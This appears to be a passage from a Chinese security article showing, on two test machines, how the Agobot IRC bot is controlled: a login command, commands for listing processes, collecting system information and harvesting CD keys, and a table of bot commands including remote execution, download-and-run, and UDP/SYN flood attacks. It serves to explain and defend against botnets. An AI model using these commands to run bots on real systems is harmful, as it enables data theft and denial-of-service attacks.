命令与控制
一旦僵尸被编辑成功,这两台测试系统就被感染了。主机已经连接上IRC服务器然后就会进入这一渠道为了能够对僵尸做出操作命令行。
主服务器和通道链接
为了对僵尸进行有效控制,授权是必须的。这一步很简单,发一个命令到通道中即可:.login FaDe dune
用户和密码授权
然后第一个僵尸被要求在被感染的计算机上运行一系列的进程:/msg FakeBot–wszyzc .pctrl.list
来自于僵尸计算机对主机的回应
然后第二台僵尸被要求寻找系统信息并且cdkeys所有的安全程序:
/msg FakeBot2–emcdnj .bot.sysinfo
/msg FakeBot2–emcdnj .harvest.cdkeys
来自于第二台僵尸计算机对主机的回应
在这一例子中,我们使用了一个很简单的功能,但是Agobot提供了很丰富的命令和功能,下表做了一些列举:
|
命令 |
描述 |
|
command.list |
List of all the available commands |
|
bot.dns |
Resolves an IP/hostname |
|
bot.execute |
Runs an .exe file on a remote computer |
|
bot.open |
打开远程计算机上的文件 |
|
bot.command |
使用系统运行命令 |
|
irc.server |
连接到IRC服务器 |
|
irc.join |
进入特定渠道 |
|
irc.privmsg |
用户发送私人信息 |
|
http.execute |
通过HTTP下载和执行文件 |
|
ftp.execute |
通过FTP下载和执行文件 |
|
ddos.udpflood |
开始UDP洪量攻击 |
|
ddos.synflood |
开始Syn洪量攻击 |
|
ddos.phaticmp |
开始PHATicmp洪量攻击 |
|
redirect.http |
开始HTTP代理 |
|
redirect.socks |
开启SOCKS4代理 |
|
pctrl.list |
进程清单 |
|
pctrl.kill |
终止程序 |
表二 Agobot的一些命令
如何保护你的计算机
以下,我们将阐述如何从用户和管理员两个维度有效的防止僵尸的感染及其攻击
上一页 1 2 3 4 下一页
安全中国首页 > 文章中心 > 安全防护